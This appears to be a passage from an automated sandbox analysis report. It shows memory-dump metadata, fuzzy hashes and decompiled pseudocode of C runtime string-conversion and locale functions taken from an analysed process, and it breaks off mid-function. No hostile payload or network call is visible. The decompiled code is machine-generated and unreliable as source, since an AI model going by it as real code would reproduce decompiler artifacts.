                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: a7bdb9d358bb0a912ec54ac19f10df619f466d188af179aa2ae3cd7bdfb9cb3d
                    • Instruction ID: 6f6bc84df467040e64bc324080a30016c3788b7b36d8802aca81aa2628db7e0f
                    • Opcode Fuzzy Hash: a7bdb9d358bb0a912ec54ac19f10df619f466d188af179aa2ae3cd7bdfb9cb3d
                    • Instruction Fuzzy Hash: 23F06831A01118BFDB219F59E909B9EBFB8FF08755F100069F905A7270CB759A40CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E013FF5BB(void* __edx, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				char _v16;
                    				int _v20;
                    				int _v24;
                    				char* _v28;
                    				int _v32;
                    				char _v36;
                    				intOrPtr _v44;
                    				char _v48;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t59;
                    				char* _t61;
                    				intOrPtr _t63;
                    				int _t64;
                    				intOrPtr* _t65;
                    				signed int _t66;
                    				signed int _t68;
                    				intOrPtr* _t71;
                    				short* _t73;
                    				int _t74;
                    				int _t76;
                    				char _t78;
                    				short* _t83;
                    				short _t85;
                    				int _t88;
                    				int _t90;
                    				char* _t95;
                    				int _t100;
                    				char* _t102;
                    				void* _t103;
                    				intOrPtr _t105;
                    				intOrPtr _t106;
                    				int _t107;
                    				short* _t109;
                    				int _t110;
                    				int _t111;
                    				signed int _t112;
                    
                    				_t103 = __edx;
                    				_t59 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t59 ^ _t112;
                    				_t61 = _a4;
                    				_t88 = _a12;
                    				_t111 = 0;
                    				_v28 = _t61;
                    				_v20 = 0;
                    				_t109 = _a8;
                    				_v24 = _t109;
                    				if(_t61 == 0 || _t88 != 0) {
                    					if(_t109 != 0) {
                    						E013FEF21(_t88,  &_v48, _t103, _a16);
                    						_t95 = _v28;
                    						if(_t95 == 0) {
                    							_t63 = _v44;
                    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
                    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
                    								if(_t64 == 0 || _v20 != _t111) {
                    									L55:
                    									_t65 = E013FDB3A();
                    									_t110 = _t109 | 0xffffffff;
                    									 *_t65 = 0x2a;
                    									goto L56;
                    								} else {
                    									_t53 = _t64 - 1; // -1
                    									_t110 = _t53;
                    									L56:
                    									if(_v36 != 0) {
                    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                    									}
                    									_t66 = _t110;
                    									goto L59;
                    								}
                    							}
                    							_t68 =  *_t109 & 0x0000ffff;
                    							if(_t68 == 0) {
                    								L51:
                    								_t110 = _t111;
                    								goto L56;
                    							}
                    							while(_t68 <= 0xff) {
                    								_t109 =  &(_t109[1]);
                    								_t111 = _t111 + 1;
                    								_t68 =  *_t109 & 0x0000ffff;
                    								if(_t68 != 0) {
                    									continue;
                    								}
                    								goto L51;
                    							}
                    							goto L55;
                    						}
                    						_t105 = _v44;
                    						if( *((intOrPtr*)(_t105 + 0xa8)) != _t111) {
                    							if( *((intOrPtr*)(_t105 + 4)) != 1) {
                    								_t110 = WideCharToMultiByte( *(_t105 + 8), _t111, _t109, 0xffffffff, _t95, _t88, _t111,  &_v20);
                    								if(_t110 == 0) {
                    									if(_v20 != _t111 || GetLastError() != 0x7a) {
                    										L45:
                    										_t71 = E013FDB3A();
                    										_t111 = _t111 | 0xffffffff;
                    										 *_t71 = 0x2a;
                    										goto L51;
                    									} else {
                    										if(_t88 == 0) {
                    											goto L56;
                    										}
                    										_t73 = _v24;
                    										while(1) {
                    											_t106 = _v44;
                    											_t100 =  *(_t106 + 4);
                    											if(_t100 > 5) {
                    												_t100 = 5;
                    											}
                    											_t74 = WideCharToMultiByte( *(_t106 + 8), _t111, _t73, 1,  &_v16, _t100, _t111,  &_v20);
                    											_t90 = _a12;
                    											_t107 = _t74;
                    											if(_t107 == 0 || _v20 != _t111 || _t107 < 0 || _t107 > 5) {
                    												goto L55;
                    											}
                    											if(_t107 + _t110 > _t90) {
                    												goto L56;
                    											}
                    											_t76 = _t111;
                    											_v32 = _t76;
                    											if(_t107 <= 0) {
                    												L43:
                    												_t73 = _v24 + 2;
                    												_v24 = _t73;
                    												if(_t110 < _t90) {
                    													continue;
                    												}
                    												goto L56;
                    											}
                    											_t102 = _v28;
                    											while(1) {
                    												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
                    												 *((char*)(_t102 + _t110)) = _t78;
                    												if(_t78 == 0) {
                    													goto L56;
                    												}
                    												_t76 = _v32 + 1;
                    												_t110 = _t110 + 1;
                    												_v32 = _t76;
                    												if(_t76 < _t107) {
                    													continue;
                    												}
                    												goto L43;
                    											}
                    											goto L56;
                    										}
                    										goto L55;
                    									}
                    								}
                    								if(_v20 != _t111) {
                    									goto L45;
                    								}
                    								_t28 = _t110 - 1; // -1
                    								_t111 = _t28;
                    								goto L51;
                    							}
                    							if(_t88 == 0) {
                    								L21:
                    								_t111 = WideCharToMultiByte( *(_t105 + 8), _t111, _t109, _t88, _t95, _t88, _t111,  &_v20);
                    								if(_t111 == 0 || _v20 != 0) {
                    									goto L45;
                    								} else {
                    									if(_v28[_t111 - 1] == 0) {
                    										_t111 = _t111 - 1;
                    									}
                    									goto L51;
                    								}
                    							}
                    							_t83 = _t109;
                    							_v24 = _t88;
                    							while( *_t83 != _t111) {
                    								_t83 =  &(_t83[1]);
                    								_t16 =  &_v24;
                    								 *_t16 = _v24 - 1;
                    								if( *_t16 != 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							if(_v24 != _t111 &&  *_t83 == _t111) {
                    								_t88 = (_t83 - _t109 >> 1) + 1;
                    							}
                    							goto L21;
                    						}
                    						if(_t88 == 0) {
                    							goto L51;
                    						}
                    						while( *_t109 <= 0xff) {
                    							_t95[_t111] =  *_t109;
                    							_t85 =  *_t109;
                    							_t109 =  &(_t109[1]);
                    							if(_t85 == 0) {
                    								goto L51;
                    							}
                    							_t111 = _t111 + 1;
                    							if(_t111 < _t88) {
                    								continue;
                    							}
                    							goto L51;
                    						}
                    						goto L45;
                    					}
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					_t66 = E013FDA61() | 0xffffffff;
                    					goto L59;
                    				} else {
                    					_t66 = 0;
                    					L59:
                    					return E013F268B(_t66, _v8 ^ _t112);
                    				}
                    			}









































                    0x013ff5bb
                    0x013ff5c3
                    0x013ff5ca
                    0x013ff5cd
                    0x013ff5d1
                    0x013ff5d5
                    0x013ff5d7
                    0x013ff5da
                    0x013ff5de
                    0x013ff5e1
                    0x013ff5e6
                    0x013ff5f5
                    0x013ff615
                    0x013ff61a
                    0x013ff61f
                    0x013ff7bc
                    0x013ff7c5
                    0x013ff7f7
                    0x013ff7ff
                    0x013ff80b
                    0x013ff80b
                    0x013ff810
                    0x013ff813
                    0x00000000
                    0x013ff806
                    0x013ff806
                    0x013ff806
                    0x013ff819
                    0x013ff81d
                    0x013ff822
                    0x013ff822
                    0x013ff829
                    0x00000000
                    0x013ff829
                    0x013ff7ff
                    0x013ff7c7
                    0x013ff7cd
                    0x013ff7e5
                    0x013ff7e5
                    0x00000000
                    0x013ff7e5
                    0x013ff7d4
                    0x013ff7d9
                    0x013ff7dc
                    0x013ff7dd
                    0x013ff7e3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff7e3
                    0x00000000
                    0x013ff7d4
                    0x013ff625
                    0x013ff62e
                    0x013ff668
                    0x013ff6e1
                    0x013ff6e5
                    0x013ff6fb
                    0x013ff7ac
                    0x013ff7ac
                    0x013ff7b1
                    0x013ff7b4
                    0x00000000
                    0x013ff710
                    0x013ff712
                    0x00000000
                    0x00000000
                    0x013ff718
                    0x013ff71b
                    0x013ff71b
                    0x013ff71e
                    0x013ff724
                    0x013ff728
                    0x013ff728
                    0x013ff73a
                    0x013ff740
                    0x013ff743
                    0x013ff747
                    0x00000000
                    0x00000000
                    0x013ff76c
                    0x00000000
                    0x00000000
                    0x013ff772
                    0x013ff774
                    0x013ff779
                    0x013ff799
                    0x013ff79c
                    0x013ff79f
                    0x013ff7a4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff7aa
                    0x013ff77b
                    0x013ff77e
                    0x013ff77e
                    0x013ff782
                    0x013ff787
                    0x00000000
                    0x00000000
                    0x013ff790
                    0x013ff791
                    0x013ff792
                    0x013ff797
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff797
                    0x00000000
                    0x013ff77e
                    0x00000000
                    0x013ff71b
                    0x013ff6fb
                    0x013ff6ea
                    0x00000000
                    0x00000000
                    0x013ff6f0
                    0x013ff6f0
                    0x00000000
                    0x013ff6f0
                    0x013ff66c
                    0x013ff692
                    0x013ff6a5
                    0x013ff6a9
                    0x00000000
                    0x013ff6b9
                    0x013ff6c1
                    0x013ff6c7
                    0x013ff6c7
                    0x00000000
                    0x013ff6c1
                    0x013ff6a9
                    0x013ff66e
                    0x013ff670
                    0x013ff673
                    0x013ff678
                    0x013ff67b
                    0x013ff67b
                    0x013ff67f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff67f
                    0x013ff684
                    0x013ff691
                    0x013ff691
                    0x00000000
                    0x013ff684
                    0x013ff632
                    0x00000000
                    0x00000000
                    0x013ff63d
                    0x013ff648
                    0x013ff64b
                    0x013ff64e
                    0x013ff654
                    0x00000000
                    0x00000000
                    0x013ff65a
                    0x013ff65d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013ff65f
                    0x00000000
                    0x013ff63d
                    0x013ff5fc
                    0x013ff607
                    0x00000000
                    0x013ff5ec
                    0x013ff5ec
                    0x013ff82b
                    0x013ff83b
                    0x013ff83b

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8c0f58e49ae88e6c4bf10bcbc3b199e21f5dd637fd023b70486c06bb7b135ab
                    • Instruction ID: 005793eaaf57385fc07be0686721fcb9da19095bf98f443f1a250e040e75b7e5
                    • Opcode Fuzzy Hash: d8c0f58e49ae88e6c4bf10bcbc3b199e21f5dd637fd023b70486c06bb7b135ab
                    • Instruction Fuzzy Hash: 3C71923690025A9BDB218FA8C844ABEBF7DEF4536CF14422DEF11E7161DB709945CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E01405366(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				signed int _v56;
                    				char _v276;
                    				short _v278;
                    				short _v280;
                    				char _v448;
                    				signed int _v452;
                    				signed int _v456;
                    				short _v458;
                    				intOrPtr _v460;
                    				intOrPtr _v464;
                    				signed int _v468;
                    				signed int _v472;
                    				intOrPtr _v508;
                    				char _v536;
                    				signed int _v540;
                    				intOrPtr _v544;
                    				signed int _v556;
                    				char _v708;
                    				signed int _v712;
                    				signed int _v716;
                    				short _v718;
                    				signed int* _v720;
                    				signed int _v724;
                    				signed int _v728;
                    				intOrPtr _v732;
                    				signed int* _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _v748;
                    				signed int _v752;
                    				char _v820;
                    				char _v1248;
                    				char _v1256;
                    				intOrPtr _v1276;
                    				signed int _v1292;
                    				signed int _t241;
                    				void* _t244;
                    				signed int _t247;
                    				signed int _t249;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				signed int _t257;
                    				signed int _t258;
                    				signed int _t259;
                    				void* _t261;
                    				signed int _t262;
                    				signed int _t263;
                    				signed int _t264;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t276;
                    				signed int _t277;
                    				signed int _t278;
                    				intOrPtr _t279;
                    				signed int _t282;
                    				signed int _t283;
                    				signed int _t286;
                    				signed int _t287;
                    				intOrPtr _t289;
                    				signed int _t292;
                    				signed int _t293;
                    				signed int _t295;
                    				signed int _t296;
                    				signed int _t314;
                    				signed int _t315;
                    				signed int _t318;
                    				signed int _t323;
                    				void* _t324;
                    				signed int _t326;
                    				void* _t327;
                    				intOrPtr _t328;
                    				signed int _t332;
                    				signed int _t333;
                    				intOrPtr* _t336;
                    				signed int _t350;
                    				signed int _t352;
                    				signed int _t354;
                    				intOrPtr* _t355;
                    				signed int _t357;
                    				signed int _t363;
                    				intOrPtr* _t367;
                    				intOrPtr* _t370;
                    				void* _t373;
                    				signed int _t374;
                    				intOrPtr* _t375;
                    				signed int _t386;
                    				intOrPtr _t389;
                    				intOrPtr* _t390;
                    				signed int _t392;
                    				signed int* _t396;
                    				intOrPtr* _t403;
                    				intOrPtr* _t404;
                    				intOrPtr _t413;
                    				signed int _t414;
                    				short _t415;
                    				signed int _t416;
                    				void* _t417;
                    				signed int _t418;
                    				signed int _t420;
                    				intOrPtr _t421;
                    				signed int _t424;
                    				intOrPtr _t425;
                    				signed int _t427;
                    				signed int _t430;
                    				intOrPtr _t436;
                    				signed int _t437;
                    				signed int _t439;
                    				signed int _t440;
                    				signed int _t443;
                    				signed int _t445;
                    				signed int _t449;
                    				signed int* _t450;
                    				intOrPtr* _t451;
                    				short _t452;
                    				void* _t454;
                    				signed int _t456;
                    				signed int _t458;
                    				void* _t460;
                    				void* _t461;
                    				void* _t463;
                    				signed int _t464;
                    				void* _t465;
                    				void* _t467;
                    				signed int _t468;
                    				void* _t470;
                    				void* _t472;
                    				intOrPtr _t484;
                    
                    				_t413 = __edx;
                    				_t454 = _t460;
                    				_t461 = _t460 - 0xc;
                    				_push(__ebx);
                    				_push(__esi);
                    				_v12 = 1;
                    				_t350 = E0140131B(__ecx, 0x6a6);
                    				_t240 = 0;
                    				_pop(_t363);
                    				if(_t350 == 0) {
                    					L20:
                    					return _t240;
                    				} else {
                    					_push(__edi);
                    					_t2 = _t350 + 4; // 0x4
                    					_t420 = _t2;
                    					 *_t420 = 0;
                    					 *_t350 = 1;
                    					_t436 = _a4;
                    					_t4 = _t436 + 0x30; // 0x1404b65
                    					_t241 = _t4;
                    					_push( *_t241);
                    					_v16 = _t241;
                    					_push(0x1423c9c);
                    					_push( *0x1423b54);
                    					E014052A5(_t350, _t363, _t420, _t436, _t420, 0x351, 3);
                    					_t463 = _t461 + 0x18;
                    					_v8 = 0x1423b54;
                    					while(1) {
                    						L2:
                    						_t244 = E013FF0CF(_t420, 0x351, 0x1423c98);
                    						_t464 = _t463 + 0xc;
                    						if(_t244 != 0) {
                    							break;
                    						} else {
                    							_t8 = _v16 + 0x10; // 0x10
                    							_t403 = _t8;
                    							_t332 =  *_v16;
                    							_v16 = _t403;
                    							_t404 =  *_t403;
                    							goto L4;
                    						}
                    						while(1) {
                    							L4:
                    							_t413 =  *_t332;
                    							if(_t413 !=  *_t404) {
                    								break;
                    							}
                    							if(_t413 == 0) {
                    								L8:
                    								_t333 = 0;
                    							} else {
                    								_t413 =  *((intOrPtr*)(_t332 + 2));
                    								if(_t413 !=  *((intOrPtr*)(_t404 + 2))) {
                    									break;
                    								} else {
                    									_t332 = _t332 + 4;
                    									_t404 = _t404 + 4;
                    									if(_t413 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							asm("sbb eax, eax");
                    							_t363 = _v8 + 0xc;
                    							_v8 = _t363;
                    							_v12 = _v12 &  !( ~_t333);
                    							_t336 = _v16;
                    							_v16 = _t336;
                    							_push( *_t336);
                    							_push(0x1423c9c);
                    							_push( *_t363);
                    							E014052A5(_t350, _t363, _t420, _t436, _t420, 0x351, 3);
                    							_t463 = _t464 + 0x18;
                    							if(_v8 < 0x1423b84) {
                    								goto L2;
                    							} else {
                    								if(_v12 != 0) {
                    									E014012E1(_t350);
                    									_t31 = _t436 + 0x28; // 0x30ff068b
                    									_t427 = _t420 | 0xffffffff;
                    									__eflags =  *_t31;
                    									if(__eflags != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(__eflags == 0) {
                    											_t32 = _t436 + 0x28; // 0x30ff068b
                    											E014012E1( *_t32);
                    										}
                    									}
                    									_t33 = _t436 + 0x24; // 0x30ff0c46
                    									__eflags =  *_t33;
                    									if( *_t33 != 0) {
                    										asm("lock xadd [eax], edi");
                    										__eflags = _t427 == 1;
                    										if(_t427 == 1) {
                    											_t34 = _t436 + 0x24; // 0x30ff0c46
                    											E014012E1( *_t34);
                    										}
                    									}
                    									 *(_t436 + 0x24) = 0;
                    									 *(_t436 + 0x1c) = 0;
                    									 *(_t436 + 0x28) = 0;
                    									 *((intOrPtr*)(_t436 + 0x20)) = 0;
                    									_t39 = _t436 + 0x40; // 0x10468b00
                    									_t240 =  *_t39;
                    								} else {
                    									_t20 = _t436 + 0x28; // 0x30ff068b
                    									_t430 = _t420 | 0xffffffff;
                    									_t484 =  *_t20;
                    									if(_t484 != 0) {
                    										asm("lock xadd [ecx], eax");
                    										if(_t484 == 0) {
                    											_t21 = _t436 + 0x28; // 0x30ff068b
                    											E014012E1( *_t21);
                    										}
                    									}
                    									_t22 = _t436 + 0x24; // 0x30ff0c46
                    									if( *_t22 != 0) {
                    										asm("lock xadd [eax], edi");
                    										if(_t430 == 1) {
                    											_t23 = _t436 + 0x24; // 0x30ff0c46
                    											E014012E1( *_t23);
                    										}
                    									}
                    									 *(_t436 + 0x24) =  *(_t436 + 0x24) & 0x00000000;
                    									_t26 = _t350 + 4; // 0x4
                    									_t240 = _t26;
                    									 *(_t436 + 0x1c) =  *(_t436 + 0x1c) & 0x00000000;
                    									 *(_t436 + 0x28) = _t350;
                    									 *((intOrPtr*)(_t436 + 0x20)) = _t240;
                    								}
                    								goto L20;
                    							}
                    							goto L130;
                    						}
                    						asm("sbb eax, eax");
                    						_t333 = _t332 | 0x00000001;
                    						__eflags = _t333;
                    						goto L10;
                    					}
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E013FDA8E();
                    					asm("int3");
                    					_push(_t454);
                    					_t456 = _t464;
                    					_t465 = _t464 - 0x1d0;
                    					_t247 =  *0x1435234; // 0x78d9f939
                    					_v56 = _t247 ^ _t456;
                    					_t249 = _v40;
                    					_push(_t350);
                    					_push(_t436);
                    					_t437 = _v36;
                    					_push(_t420);
                    					_t421 = _v44;
                    					_v508 = _t421;
                    					__eflags = _t249;
                    					if(_t249 == 0) {
                    						_v456 = 1;
                    						_v468 = 0;
                    						_t352 = 0;
                    						_v452 = 0;
                    						__eflags = _t437;
                    						if(__eflags == 0) {
                    							L79:
                    							_t249 = E01405366(_t352, _t363, _t413, _t421, _t437, __eflags, _t421);
                    							goto L80;
                    						} else {
                    							__eflags =  *_t437 - 0x4c;
                    							if( *_t437 != 0x4c) {
                    								L58:
                    								_push(0);
                    								_t249 = E01404F2E(_t352, _t413, _t421, _t437, _t437,  &_v276, 0x83,  &_v448, 0x55);
                    								_t467 = _t465 + 0x18;
                    								__eflags = _t249;
                    								if(_t249 != 0) {
                    									_t363 = 0;
                    									__eflags = 0;
                    									_t76 = _t421 + 0x20; // 0x1404b55
                    									_t414 = _t76;
                    									_t439 = 0;
                    									_v452 = _t414;
                    									do {
                    										__eflags = _t439;
                    										if(_t439 == 0) {
                    											L73:
                    											_t254 = _v456;
                    										} else {
                    											_t367 =  *_t414;
                    											_t255 =  &_v276;
                    											while(1) {
                    												__eflags =  *_t255 -  *_t367;
                    												_t421 = _v464;
                    												if( *_t255 !=  *_t367) {
                    													break;
                    												}
                    												__eflags =  *_t255;
                    												if( *_t255 == 0) {
                    													L66:
                    													_t363 = 0;
                    													_t256 = 0;
                    												} else {
                    													_t415 =  *((intOrPtr*)(_t255 + 2));
                    													__eflags = _t415 -  *((intOrPtr*)(_t367 + 2));
                    													_v458 = _t415;
                    													_t414 = _v452;
                    													if(_t415 !=  *((intOrPtr*)(_t367 + 2))) {
                    														break;
                    													} else {
                    														_t255 = _t255 + 4;
                    														_t367 = _t367 + 4;
                    														__eflags = _v458;
                    														if(_v458 != 0) {
                    															continue;
                    														} else {
                    															goto L66;
                    														}
                    													}
                    												}
                    												L68:
                    												__eflags = _t256;
                    												if(_t256 == 0) {
                    													_t352 = _t352 + 1;
                    													__eflags = _t352;
                    													goto L73;
                    												} else {
                    													_t257 =  &_v276;
                    													_push(_t257);
                    													_push(_t439);
                    													_push(_t421);
                    													L83();
                    													_t414 = _v452;
                    													_t467 = _t467 + 0xc;
                    													__eflags = _t257;
                    													if(_t257 == 0) {
                    														_t363 = 0;
                    														_t254 = 0;
                    														_v456 = 0;
                    													} else {
                    														_t352 = _t352 + 1;
                    														_t363 = 0;
                    														goto L73;
                    													}
                    												}
                    												goto L74;
                    											}
                    											asm("sbb eax, eax");
                    											_t256 = _t255 | 0x00000001;
                    											_t363 = 0;
                    											__eflags = 0;
                    											goto L68;
                    										}
                    										L74:
                    										_t439 = _t439 + 1;
                    										_t414 = _t414 + 0x10;
                    										_v452 = _t414;
                    										__eflags = _t439 - 5;
                    									} while (_t439 <= 5);
                    									__eflags = _t254;
                    									if(__eflags != 0) {
                    										goto L79;
                    									} else {
                    										__eflags = _t352;
                    										goto L77;
                    									}
                    								}
                    								goto L80;
                    							} else {
                    								__eflags =  *(_t437 + 2) - 0x43;
                    								if( *(_t437 + 2) != 0x43) {
                    									goto L58;
                    								} else {
                    									__eflags =  *((short*)(_t437 + 4)) - 0x5f;
                    									if( *((short*)(_t437 + 4)) != 0x5f) {
                    										goto L58;
                    									} else {
                    										while(1) {
                    											_t258 = E0140E9DF(_t437, 0x1423c90);
                    											_t354 = _t258;
                    											_v472 = _t354;
                    											_pop(_t369);
                    											__eflags = _t354;
                    											if(_t354 == 0) {
                    												break;
                    											}
                    											_t259 = _t258 - _t437;
                    											__eflags = _t259;
                    											_v456 = _t259 >> 1;
                    											if(_t259 == 0) {
                    												break;
                    											} else {
                    												_t261 = 0x3b;
                    												__eflags =  *_t354 - _t261;
                    												if( *_t354 == _t261) {
                    													break;
                    												} else {
                    													_t424 = _v456;
                    													_t355 = 0x1423b54;
                    													_v460 = 1;
                    													do {
                    														_t262 = E0140E9A5( *_t355, _t437, _t424);
                    														_t465 = _t465 + 0xc;
                    														__eflags = _t262;
                    														if(_t262 != 0) {
                    															goto L45;
                    														} else {
                    															_t370 =  *_t355;
                    															_t413 = _t370 + 2;
                    															do {
                    																_t328 =  *_t370;
                    																_t370 = _t370 + 2;
                    																__eflags = _t328 - _v468;
                    															} while (_t328 != _v468);
                    															_t369 = _t370 - _t413 >> 1;
                    															__eflags = _t424 - _t370 - _t413 >> 1;
                    															if(_t424 != _t370 - _t413 >> 1) {
                    																goto L45;
                    															}
                    														}
                    														break;
                    														L45:
                    														_v460 = _v460 + 1;
                    														_t355 = _t355 + 0xc;
                    														__eflags = _t355 - 0x1423b84;
                    													} while (_t355 <= 0x1423b84);
                    													_t352 = _v472 + 2;
                    													_t263 = E0140E955(_t369, _t352, 0x1423c98);
                    													_t421 = _v464;
                    													_t440 = _t263;
                    													_pop(_t373);
                    													__eflags = _t440;
                    													if(_t440 != 0) {
                    														L48:
                    														__eflags = _v460 - 5;
                    														if(_v460 > 5) {
                    															_t264 = _v452;
                    															goto L54;
                    														} else {
                    															_push(_t440);
                    															_t266 = E0140D9C1(_t373,  &_v276, 0x83, _t352);
                    															_t468 = _t465 + 0x10;
                    															__eflags = _t266;
                    															if(_t266 != 0) {
                    																L82:
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																_push(0);
                    																E013FDA8E();
                    																asm("int3");
                    																_push(_t456);
                    																_t458 = _t468;
                    																_t269 =  *0x1435234; // 0x78d9f939
                    																_v556 = _t269 ^ _t458;
                    																_push(_t352);
                    																_t357 = _v540;
                    																_push(_t440);
                    																_push(_t421);
                    																_t425 = _v544;
                    																_v1292 = _t357;
                    																_v1276 = E01406A01(_t357, _t373, _t413) + 0x278;
                    																_push( &_v1256);
                    																_t276 = E01404F2E(_t357, _t413, _t425, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                    																_t470 = _t468 - 0x2e4 + 0x18;
                    																__eflags = _t276;
                    																if(_t276 != 0) {
                    																	_t101 = _t357 + 2; // 0x6
                    																	_t443 = _t101 << 4;
                    																	__eflags = _t443;
                    																	_t277 =  &_v280;
                    																	_v724 = _t443;
                    																	_t416 =  *(_t443 + _t425);
                    																	_t374 = _t416;
                    																	while(1) {
                    																		_v712 = _v712 & 0x00000000;
                    																		__eflags =  *_t277 -  *_t374;
                    																		_t445 = _v724;
                    																		if( *_t277 !=  *_t374) {
                    																			break;
                    																		}
                    																		__eflags =  *_t277;
                    																		if( *_t277 == 0) {
                    																			L91:
                    																			_t278 = _v712;
                    																		} else {
                    																			_t452 =  *((intOrPtr*)(_t277 + 2));
                    																			__eflags = _t452 -  *((intOrPtr*)(_t374 + 2));
                    																			_v718 = _t452;
                    																			_t445 = _v724;
                    																			if(_t452 !=  *((intOrPtr*)(_t374 + 2))) {
                    																				break;
                    																			} else {
                    																				_t277 = _t277 + 4;
                    																				_t374 = _t374 + 4;
                    																				__eflags = _v718;
                    																				if(_v718 != 0) {
                    																					continue;
                    																				} else {
                    																					goto L91;
                    																				}
                    																			}
                    																		}
                    																		L93:
                    																		__eflags = _t278;
                    																		if(_t278 != 0) {
                    																			_t375 =  &_v280;
                    																			_t417 = _t375 + 2;
                    																			do {
                    																				_t279 =  *_t375;
                    																				_t375 = _t375 + 2;
                    																				__eflags = _t279 - _v712;
                    																			} while (_t279 != _v712);
                    																			_v728 = (_t375 - _t417 >> 1) + 1;
                    																			_t282 = E0140131B(_t375 - _t417 >> 1, 4 + ((_t375 - _t417 >> 1) + 1) * 2);
                    																			_v740 = _t282;
                    																			__eflags = _t282;
                    																			if(_t282 == 0) {
                    																				goto L84;
                    																			} else {
                    																				_v732 =  *((intOrPtr*)(_t445 + _t425));
                    																				_t125 = _t357 * 4; // 0xa094
                    																				_v744 =  *((intOrPtr*)(_t425 + _t125 + 0xa0));
                    																				_t128 = _t425 + 8; // 0x8b56ff8b
                    																				_v748 =  *_t128;
                    																				_t384 =  &_v280;
                    																				_v720 = _t282 + 4;
                    																				_t286 = E013FF144(_t282 + 4, _v728,  &_v280);
                    																				_t472 = _t470 + 0xc;
                    																				__eflags = _t286;
                    																				if(_t286 != 0) {
                    																					_t287 = _v712;
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					E013FDA8E();
                    																					asm("int3");
                    																					_t289 =  *0x143a65c; // 0x0
                    																					return _t289;
                    																				} else {
                    																					__eflags = _v280 - 0x43;
                    																					 *((intOrPtr*)(_t445 + _t425)) = _v720;
                    																					if(_v280 != 0x43) {
                    																						L102:
                    																						_t292 = E01404C3B(_t357, _t384, _t425,  &_v708);
                    																						_t386 = _v712;
                    																						 *(_t425 + 0xa0 + _t357 * 4) = _t292;
                    																					} else {
                    																						__eflags = _v278;
                    																						if(_v278 != 0) {
                    																							goto L102;
                    																						} else {
                    																							_t386 = _v712;
                    																							 *(_t425 + 0xa0 + _t357 * 4) = _t386;
                    																						}
                    																					}
                    																					__eflags = _t357 - 2;
                    																					if(_t357 != 2) {
                    																						__eflags = _t357 - 1;
                    																						if(_t357 != 1) {
                    																							__eflags = _t357 - 5;
                    																							if(_t357 == 5) {
                    																								 *((intOrPtr*)(_t425 + 0x14)) = _v716;
                    																							}
                    																						} else {
                    																							 *((intOrPtr*)(_t425 + 0x10)) = _v716;
                    																						}
                    																					} else {
                    																						_t450 = _v736;
                    																						_t418 = _t386;
                    																						_t396 = _t450;
                    																						 *(_t425 + 8) = _v716;
                    																						_v720 = _t450;
                    																						_v728 = _t450[8];
                    																						_v716 = _t450[9];
                    																						while(1) {
                    																							_t154 = _t425 + 8; // 0x8b56ff8b
                    																							__eflags =  *_t154 -  *_t396;
                    																							if( *_t154 ==  *_t396) {
                    																								break;
                    																							}
                    																							_t451 = _v720;
                    																							_t418 = _t418 + 1;
                    																							_t323 =  *_t396;
                    																							 *_t451 = _v728;
